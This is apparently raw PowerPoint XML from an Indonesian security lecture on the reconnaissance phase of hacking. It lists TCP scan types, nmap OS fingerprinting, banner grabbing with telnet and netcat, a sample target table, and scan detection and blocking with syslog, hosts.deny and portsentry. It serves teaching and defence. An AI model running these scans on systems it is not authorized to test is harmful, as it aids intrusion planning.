                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>icmpquery –m 192.168.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1	: 0xFFFFFFE0</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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Jenis Scaning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>TCP connect scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>TCP SYN scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>TCP FIN scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>TCP Xmas Tree scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>TCP Null scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>TCP ACK scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>TCP Window scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>TCP RPC scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>UDP scan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Deteksi Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Syslog, icmplog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>root# tail /var/log/syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>May 16 15:40:42 epson tcplogd: "Syn probe" notebook[192.168.1.4]:[8422]&gt;epson[192.168.1.2]:[635]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>May 16 15:40:42 epson tcplogd: "Syn probe" notebook[192.168.1.4]:[8423]&gt;epson[192.168.1.2]:ssl-ldap</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>May 16 15:40:42 epson tcplogd: "Syn probe" notebook[192.168.1.4]:[8426]&gt;epson[192.168.1.2]:[637]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>May 16 15:40:42 epson tcplogd: "Syn probe" notebook[192.168.1.4]:[8429]&gt;epson[192.168.1.2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Tujuan </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>Setelah perkuliahan ini mahasiswa dapat menjelaskan :</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>cara intruder mengekploitasi lubang-lubang keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>hack anatomi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="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Penangkal Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Langsung melakukan pemblokiran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>access control list (/etc/hosts.deny)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mengubah routing table (drop)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mengubah rule dari firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Contoh software: portsentry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OS Fingerprinting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menentukan jenis OS dengan melihat implementasi TCP/IP stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Queso</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>nmap –O 192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>X (passive OS detection)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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Application fingerprinting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Banner grabbing: dari aplikasi (misal SMTP)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>telnet server.name 25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo -e "GET /index.html HTTP/1.0\n\n" | nc 192.168.1.3 80 | less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Date: Sat, 27 Apr 2002 02:34:10 GMT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Apache/1.3.24 (Unix) Debian GNU/Linux PHP/4.1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Last-Modified: Thu, 19 Jul 2001 13:21:07 GMT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ETag: "fa59-ffe-3b56dec3“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-Ranges: bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length: 4094</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html; charset=iso-8859-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin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Langkah selanjutnya….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Memenuhi “tabel” target data-data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Melakukan searching untuk membandingkan target dengan daftar eksploitasi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Selanjutnya: initial access (mulai masuk)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Security policy. Apakah scanning termasuk hal yang illegal? Di beberapa tempat: ya</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26628" name="Group 40"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2362200"/>
            <a:ext cx="7924800" cy="1143000"/>
            <a:chOff x="384" y="1056"/>
            <a:chExt cx="4992" cy="1274"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26629" name="Rectangle 41"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3696" y="2042"/>
              <a:ext cx="1680" cy="288"/>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SMTP</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26630" name="Rectangle 42"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2928" y="2042"/>
              <a:ext cx="768" cy="288"/>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endParaRPr lang="en-US" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26631" name="Rectangle 43"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2381" y="2042"/>
              <a:ext cx="547" cy="288"/>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endParaRPr lang="en-US" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26632" name="Rectangle 44"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1382" y="2042"/>
              <a:ext cx="999" cy="288"/>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endParaRPr lang="en-US" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26633" name="Rectangle 45"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="2042"/>
              <a:ext cx="998" cy="288"/>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mail.bank.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26634" name="Rectangle 46"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3696" y="1717"/>
              <a:ext cx="1680"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NetBIOS, ftp, http (IIS)</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26635" name="Rectangle 47"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2928" y="1717"/>
              <a:ext cx="768"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Win 2000, SP3</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26636" name="Rectangle 48"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2381" y="1717"/>
              <a:ext cx="547"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Ya</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26637" name="Rectangle 49"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1382" y="1717"/>
              <a:ext cx="999"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10.10.10.1</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26638" name="Rectangle 50"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384" y="1717"/>
              <a:ext cx="998"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xyz.</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26639" name="Rectangle 51"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3696" y="1392"/>
              <a:ext cx="1680"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http</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26640" name="Rectangle 52"/>
